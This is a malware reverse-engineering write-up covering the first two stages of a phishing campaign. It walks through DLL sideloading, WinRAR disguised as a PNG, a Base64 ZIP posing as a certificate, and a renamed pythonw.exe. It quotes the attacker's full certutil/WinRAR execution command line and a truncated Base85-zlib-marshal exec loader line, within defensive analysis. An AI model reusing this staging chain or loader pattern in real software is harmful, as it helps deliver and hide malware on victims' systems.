Introduction

Join me as we peel back layer upon layer of Python code, shellcode, and executables, each more difficult than the last, in an effort to uncover a novel attack campaign: an operation that appears to have been orchestrated by a single threat actor who successfully evaded detection and operated entirely under the radar.

Strap in: this is the first instalment of a six-part series, with each part diving into a different stage of the malware.

This section introduces the foundational knowledge necessary for understanding Python malware reverse engineering. It explores the early-stage payload structure and simple obfuscation techniques used in the initial stages of execution.

Note: Since writing this, SentinelOne has published an excellent report covering Stages 1–5. It’s well worth a read for additional context, though the material from Stages 6–9 remains unique to this write-up, so stick around for that.


This attack begins with a phishing email that emphasises the importance of reading an attached document related to copyright infringement. However, the attachment is not a document at all; it’s a ZIP archive masquerading as one.

VirusTotal reference: https://www.virustotal.com/gui/file/a3963c1f05b6c13e6e5973b1f4d0152d01e946ffaf79d9b5908d0d1f1eb5a6d1

Once unzipped, the folder reveals the following contents:


  • Detailed_report_document_on_actions_involving_copyrighted_material.exe
  • vcruntime140.dll
  • version.dll
  • _\Document.pdf (inside the hidden folder _)
  • _\Images.png (inside the hidden folder _)

The Lure: A Fake PDF

The primary lure in this attack is the file: Detailed_report_document_on_actions_involving_copyrighted_material.exe

This executable is disguised with a PDF icon and given a deliberately long filename to hide its .exe extension in file explorers, aiming to trick users into thinking it’s a legitimate document. However, the .exe extension betrays its true nature.

Running a quick hash search on VirusTotal shows that this file is, interestingly, a known (semi-legitimate) PDF reader:

hpreader.exe on VirusTotal

The executable appears to be signed and hasn’t been directly modified. This leads us to the next logical point of investigation: DLL side-loading.


What’s a DLL?

A DLL (Dynamic Link Library) is a file that contains code and data that programs can use. Think of it as a toolbox: rather than each program carrying its own tools, they share common ones (DLLs) to save space and make updates easier.

For example, a program might ask Windows to load vcruntime140.dll to make use of standard C runtime functions, such as memory allocation, string manipulation, or exception handling.


Now, What’s “Sideloading”?

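Sideloading is when a program loads a DLL from its own folder rather than from the official location (such as C:\Windows\System32). It works because, for DLLs that are not on the protected KnownDLLs list, Windows checks the application’s own directory before the system directories.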

Attackers abuse this by:

  1. Finding a legitimate program that looks for a specific DLL.
  2. Placing a malicious version of that DLL next to the program.
  3. When the program runs, it loads the attacker’s fake DLL instead of the real one.

Because the program itself is trusted (and may even be signed by a well-known company), security tools may not raise an alarm, since the activity looks normal.
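To make the search-order idea concrete, here is a minimal Python model of the loader’s decision. It is a simplification under stated assumptions: SafeDllSearchMode is enabled, there are no manifests or redirection, and only the first few search locations are modelled (the application directory, System32, then the Windows directory). The KNOWN_DLLS set is a small illustrative subset; the real list lives in the registry under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs. resolve_dll is a hypothetical helper, not a Windows API.

```python
from __future__ import annotations

from pathlib import PureWindowsPath

# Illustrative subset only; the real list is read from the KnownDLLs registry key.
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "advapi32.dll"}

SYSTEM_DIR = r"C:\Windows\System32"
WINDOWS_DIR = r"C:\Windows"


def resolve_dll(name: str, app_dir: str, present: set[str]) -> str | None:
    """Return the path a simplified loader would pick for `name`.

    `present` holds lower-cased full paths of DLLs that exist on disk.
    Assumes SafeDllSearchMode; the 16-bit system folder, the current
    directory and PATH entries are omitted for brevity.
    """
    name = name.lower()
    # Known DLLs are always mapped from the system directory.
    if name in KNOWN_DLLS:
        return str(PureWindowsPath(SYSTEM_DIR, name))
    # Otherwise the application's own folder is checked first,
    # which is exactly the behaviour sideloading exploits.
    for directory in (app_dir, SYSTEM_DIR, WINDOWS_DIR):
        candidate = str(PureWindowsPath(directory, name))
        if candidate.lower() in present:
            return candidate
    return None
```

For example, with both a version.dll in the sample folder and the genuine copy in System32, resolve_dll("version.dll", r"C:\Users\Malware\Desktop\sample", present) picks the copy in the sample folder, while a Known DLL would still come from System32.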


Investigating the DLLs

When inspecting the bundled DLLs:

  • vcruntime140.dll still has a valid Microsoft signature, so it’s likely a legitimate dependency or decoy.
  • That means we can focus our attention on the more suspicious file: version.dll.

Digging Deeper into the Hidden Files

So we have identified the likely malicious binary, version.dll, but there are two other files tucked away in a hidden folder:

  • Document.pdf
  • Images.png

Let’s take a closer look at them.


Images.png – A Familiar Signature

Opening Images.png, we quickly realise it’s not actually an image.

Viewing it with a hex editor, we see the file begins with the familiar magic bytes:

4D 5A

That’s “MZ” in ASCII, the signature of a Windows executable file.
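Checking magic bytes is easy to script. The sketch below compares a file’s first bytes against a handful of well-known signatures; the table is deliberately short and illustrative, and identify and identify_file are hypothetical helper names.

```python
from pathlib import Path

# A few well-known file signatures ("magic bytes"); far from exhaustive.
SIGNATURES = [
    (b"MZ", "Windows executable (MZ/PE)"),
    (b"PK\x03\x04", "ZIP archive (also .docx, .jar, ...)"),
    (b"%PDF", "PDF document"),
    (b"\x89PNG\r\n\x1a\n", "PNG image"),
    (b"-----BEGIN", "PEM-style text block"),
]


def identify(header: bytes) -> str:
    """Return the label of the first matching signature, or 'unknown'."""
    for magic, label in SIGNATURES:
        if header.startswith(magic):
            return label
    return "unknown"


def identify_file(path: str) -> str:
    """Read only the first few bytes; the file extension is ignored entirely."""
    with Path(path).open("rb") as handle:
        return identify(handle.read(16))
```

Pointed at _\Images.png, a check like this would report a Windows executable rather than a PNG image, matching what the hex editor shows.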

Running the hash through VirusTotal and inspecting the signature confirms it: this isn’t an image; it’s a legitimate WinRAR executable.

So why is WinRAR bundled in a phishing ZIP?

This suggests the attacker is using a Bring Your Own Binary (BYOB) technique, in this case bundling WinRAR to ensure consistent execution of their payload regardless of what’s installed on the victim’s system.

We’ll want to keep an eye out for zipped or self-extracting archives.


Document.pdf – Suspiciously Large “Key”

Next, we inspect Document.pdf. At first it appears to be plain text, but the contents look strange:

  • It starts with a header resembling a Base64-encoded certificate:
    • -----BEGIN CERTIFICATE-----
  • But the file is 23.4 MB, which is far too large for a certificate.
  • The contents appear to be Base64-encoded, which is common for keys and certificates but could also be concealing something.

So let’s test a theory: we strip off the header and decode the Base64 blob in CyberChef.


And there it is: decoding the Base64 reveals a file beginning with:

50 4B

That’s the “PK” signature of a ZIP archive (shared by ZIP-based formats such as .docx and .jar).
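The CyberChef recipe can be approximated in a few lines of Python. This sketch assumes the file is plain text with PEM-style “-----” marker lines around the Base64 body; whether the sample also has an END line is an assumption, and the function works either way. decode_fake_certificate is a hypothetical helper name.

```python
import base64


def decode_fake_certificate(text: str) -> bytes:
    """Strip PEM-style marker lines and Base64-decode the remaining body."""
    body = "".join(
        line.strip()
        for line in text.splitlines()
        # Skip blank lines and any '-----BEGIN ...-----' / '-----END ...-----' markers.
        if line.strip() and not line.startswith("-----")
    )
    # validate=True rejects stray non-Base64 characters instead of silently dropping them.
    return base64.b64decode(body, validate=True)
```

Applied to the text of Document.pdf, the first two bytes of the result should be b"PK", in line with the CyberChef output.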


The Payload is Found

We’ve now uncovered what appears to be the Stage 2 payload, hidden inside Document.pdf under the guise of a bogus certificate.

Saving the decoded output as a .zip file and opening it reveals the second stage, now ready to be analysed.
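Rather than saving the decoded bytes to disk first, Python’s zipfile module can open the archive straight from memory and list what it contains. A minimal sketch; list_archive is a hypothetical helper, and it only reads the archive’s directory entries, so nothing is extracted or executed.

```python
from __future__ import annotations

import io
import zipfile


def list_archive(data: bytes) -> list[tuple[str, int]]:
    """Return (member name, uncompressed size) pairs without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        return [(info.filename, info.file_size) for info in archive.infolist()]
```

Feeding it the decoded Base64 bytes gives a quick inventory of the Stage 2 files before anything touches the analysis host’s disk.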

And just like that…


Stage 2 begins.

Sandbox Execution & Process Observation

Before proceeding further, let’s validate our hypothesis by executing the original payload in a sandboxed environment.

Utilising Sysmon (and powerSIEM), we captured the following process creation event:

Type: Process Create

Image: C:\Windows\SysWOW64\cmd.exe

ParentImage: C:\Users\Malware\Desktop\sample\Detailed_report_document_on_actions_involving_copyrighted_material.exe

CommandLine: cmd /c cd _ && start Document.pdf && certutil -decode Document.pdf Invoice.pdf && images.png x -ibck -y Invoice.pdf C:\Users\Public && start C:\Users\Public\Windows\svchost.exe C:\Users\Public\Windows\Lib\images.png ADN_UZJomrp3vPMujoH4bot
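Long chained command lines like this are easier to read once split into individual steps. A naive sketch, assuming no quoted or caret-escaped && sequences (which a real cmd.exe parser would have to handle); split_cmd_chain is a hypothetical helper.

```python
from __future__ import annotations


def split_cmd_chain(command_line: str) -> list[str]:
    """Split a 'cmd /c step1 && step2 && ...' command line into its steps.

    Naive: it does not understand quoting or ^ escapes.
    """
    prefix = "cmd /c "
    if command_line.lower().startswith(prefix):
        command_line = command_line[len(prefix):]
    return [step.strip() for step in command_line.split("&&")]


# The command line captured by Sysmon, split across raw strings for readability.
COMMAND_LINE = (
    r"cmd /c cd _ && start Document.pdf && certutil -decode Document.pdf Invoice.pdf"
    r" && images.png x -ibck -y Invoice.pdf C:\Users\Public"
    r" && start C:\Users\Public\Windows\svchost.exe"
    r" C:\Users\Public\Windows\Lib\images.png ADN_UZJomrp3vPMujoH4bot"
)

for number, step in enumerate(split_cmd_chain(COMMAND_LINE), start=1):
    print(number, step)
```

This prints five numbered steps, starting with cd _ and ending with the svchost.exe launch.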

Step-by-Step Breakdown of the Command

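Let’s unpack this command step-by-step. After changing into the hidden _ folder (cd _), it chains the following commands with &&, so each one runs only if the previous one succeeded: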

start Document.pdf

  • Opens the file Document.pdf with the default PDF viewer.
  • This distracts the user; however, since the file is actually a Base64-encoded ZIP archive, the PDF viewer displays an error.

certutil -decode Document.pdf Invoice.pdf

  • Base64-decodes Document.pdf and writes the result to Invoice.pdf.
  • certutil is a built-in Windows binary, making this a clever use of a LOLBin (Living Off the Land Binary) to decode the payload.

images.png x -ibck -y Invoice.pdf C:\Users\Public

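  • Remember that images.png is really WinRAR: x extracts the contents of the decoded Invoice.pdf (a disguised archive) with full paths, -ibck runs WinRAR in the background, and -y answers Yes to every prompt.
  • Files are extracted into C:\Users\Public; judging by the next command, the archive contains a Windows folder, so the payload lands in C:\Users\Public\Windows.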

start C:\Users\Public\Windows\svchost.exe C:\Users\Public\Windows\Lib\images.png ADN_UZJomrp3vPMujoH4bot

  • Launches the extracted svchost.exe from C:\Users\Public\Windows, passing it C:\Users\Public\Windows\Lib\images.png and the string ADN_UZJomrp3vPMujoH4bot as arguments.

On to Stage 2

Upon examining the command captured by Sysmon, we notice two files that are new to this stage:

start C:\Users\Public\Windows\svchost.exe C:\Users\Public\Windows\Lib\images.png ADN_UZJomrp3vPMujoH4bot

From this, we can assume:

  • svchost.exe and images.png are part of the Stage 2 payload
  • An argument (ADN_UZJomrp3vPMujoH4bot) is passed in, possibly a key or an ID.

svchost.exe – A Familiar Name, but Suspicious Behaviour

Despite the name, this isn’t the real Windows svchost.exe. Checking the signature reveals it’s signed by:

Python Software Foundation

That’s a strong clue, and VirusTotal confirms it’s the legitimate pythonw.exe, the variant of the Python interpreter that runs without a console window and is often used for background scripts.
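Put together, the final command simply asks Python to run images.png as a script and hands it ADN_UZJomrp3vPMujoH4bot as its first argument; the interpreter does not care about the file extension. The sketch below demonstrates this with a harmless stand-in script (our own contents, not the sample’s), launched with the current interpreter via sys.executable; pythonw.exe handles arguments the same way but without a console window. run_disguised_script is a hypothetical helper name.

```python
import subprocess
import sys
import tempfile
from pathlib import Path

# Harmless stand-in for the disguised script: it just echoes its first argument.
STAND_IN_SOURCE = "import sys\nprint(sys.argv[1])\n"


def run_disguised_script(token: str) -> str:
    """Run a Python script saved with a .png extension and return its output."""
    with tempfile.TemporaryDirectory() as tmp:
        script = Path(tmp, "images.png")
        script.write_text(STAND_IN_SOURCE)
        result = subprocess.run(
            [sys.executable, str(script), token],
            capture_output=True,
            text=True,
            check=True,
        )
    return result.stdout.strip()


print(run_disguised_script("ADN_UZJomrp3vPMujoH4bot"))
```

Inside images.png, the token would therefore be available as sys.argv[1].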


images.png – Obfuscated Python Script

Opening images.png in a hex editor reveals it’s actually Python source code, albeit heavily obfuscated.

To make things easier, we rename it to stage2.py so we can explore it with syntax highlighting in VSCode.


Obfuscation & Dynamic Execution

Skimming the file, we find a large number of dummy variables and unused functions, a very basic form of obfuscation.
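Rather than scrolling past all of that junk by hand, the standard library’s ast module can parse the file (without running it) and flag direct calls to builtins commonly used for dynamic execution. A minimal sketch; find_suspicious_calls and the contents of SUSPICIOUS are illustrative choices, and obfuscation that reaches exec indirectly (for example through getattr) would slip past it.

```python
from __future__ import annotations

import ast

# Builtins frequently abused to load or run code dynamically (illustrative list).
SUSPICIOUS = {"exec", "eval", "compile", "__import__"}


def find_suspicious_calls(source: str) -> list[tuple[int, str]]:
    """Return sorted (line number, name) pairs for direct calls to SUSPICIOUS builtins.

    ast.parse only builds a syntax tree; nothing in `source` is executed.
    """
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id in SUSPICIOUS
        ):
            hits.append((node.lineno, node.func.id))
    return sorted(hits)
```

Run over stage2.py, a pass like this should surface the payload trigger among the dummy code.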


But buried in the middle, we see the key payload trigger:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c$|ee*>>VcmVoh+&b9W+s_L$Gd..............")

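Breaking this down, from the innermost call outwards:

  • base64.b85decode() decodes the blob; interestingly, it uses Base85 encoding, a less common alternative to Base64
  • zlib.decompress() decompresses the decoded bytes
  • marshal.loads() turns the result into a precompiled Python code object (bytecode)
  • exec() runs that code object dynamically at runtime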
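Because the chain is just three standard-library decoding calls wrapped in exec(), it can be reversed safely by performing the same steps and simply never calling exec(). The sketch below first builds a harmless stand-in blob the way the loader’s blob appears to have been built, then unpacks it and disassembles the result with dis. unpack_layer is a hypothetical helper; the real blob is truncated above and is not reproduced here.

```python
import base64
import dis
import marshal
import types
import zlib


def unpack_layer(blob: str) -> types.CodeType:
    """Undo b85decode -> zlib.decompress -> marshal.loads, stopping short of exec()."""
    code = marshal.loads(zlib.decompress(base64.b85decode(blob)))
    if not isinstance(code, types.CodeType):
        raise TypeError(f"expected a code object, got {type(code).__name__}")
    return code


# Harmless stand-in built in reverse order: compile -> marshal -> zlib -> Base85.
stand_in = base64.b85encode(
    zlib.compress(marshal.dumps(compile("print('hello')", "<stand-in>", "exec")))
).decode("ascii")

code_obj = unpack_layer(stand_in)
dis.dis(code_obj)  # inspect the bytecode instead of running it
```

Two caveats: marshalled code objects are tied to the Python version that produced them, so the analysis interpreter generally needs to match the one shipped with the sample; and the Python documentation warns that marshal is not secure against maliciously constructed data, so this belongs in an isolated analysis VM.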

What’s Python Bytecode?

You might not be familiar with Python bytecode; after all, Python is usually described as an interpreted language. Bytecode files aren’t particularly common in malware analysis, so here’s a quick primer:

  • .py files are Python source code: human-readable and editable.
  • .pyc files contain compiled bytecode, which Python generates automatically (and caches in __pycache__) when a module is imported.
  • Loading cached bytecode lets the interpreter skip the compilation step, but bytecode itself is not human-readable.
  • To reverse it back into source code, we’ll need a decompiler such as uncompyle6, or the standard library’s dis module to view a disassembly of the bytecode.
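The link between .pyc files and the loader’s marshal call is easy to demonstrate. On CPython 3.7 and later, a .pyc file is a 16-byte header (magic number, flags, and either a source timestamp and size or a source hash) followed by a marshalled code object, the same kind of object the Base85 blob above appears to contain. The sketch compiles a throwaway module, checks the magic number against the running interpreter, unmarshals the code object and disassembles it; load_pyc is a hypothetical helper.

```python
import dis
import importlib.util
import marshal
import py_compile
import tempfile
import types
from pathlib import Path

HEADER_SIZE = 16  # CPython 3.7+ .pyc header (PEP 552)


def load_pyc(pyc_path: Path) -> types.CodeType:
    """Return the code object stored in a .pyc written by this interpreter version."""
    data = pyc_path.read_bytes()
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("magic number mismatch: compiled by a different Python version")
    return marshal.loads(data[HEADER_SIZE:])


with tempfile.TemporaryDirectory() as tmp:
    source = Path(tmp, "example.py")
    source.write_text("def greet(name):\n    return 'hi ' + name\n")
    pyc = Path(py_compile.compile(str(source), cfile=str(Path(tmp, "example.pyc"))))
    code_obj = load_pyc(pyc)

dis.dis(code_obj)  # disassembly of the module-level bytecode (and nested functions)
```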

Understanding the difference between source code and bytecode is crucial for progressing with the analysis in Stage 3.


Conclusion

Through the analysis of Stages 1 and 2, we’ve uncovered the attacker’s initial strategy: leveraging trusted binaries, sideloaded DLLs, and cleverly disguised payloads to establish execution without raising suspicion. From the fake PDF lure to the use of certutil, WinRAR, and embedded Python scripts, it’s clear this campaign was designed to operate quietly and effectively under the radar.

By the end of this stage, we’ve identified how the payloads are obfuscated, staged, and executed using legitimate tools in unintended ways. Most importantly, we’ve decoded the structure and intent behind the initial infection vector, providing a strong foundation for deeper memory-focused analysis.


Up Next: Stage 3 – Dissecting In-Memory Python Bytecode

In Part 2, we’ll step into the world of in-memory execution. We’ll decode the Base85-encoded bytecode, reverse engineer the custom cryptographic loader, and uncover how the attacker dynamically executes Python payloads without ever touching disk.

We’ll also look at:

  • Disassembling Python bytecode with dis
  • Rebuilding encryption logic from marshalled code
  • Extracting runtime payloads from obfuscated blobs
  • Reversing multiple layers of encryption and obfuscation

Get ready for a deep dive into the mechanics of bytecode analysis and memory-only payload execution.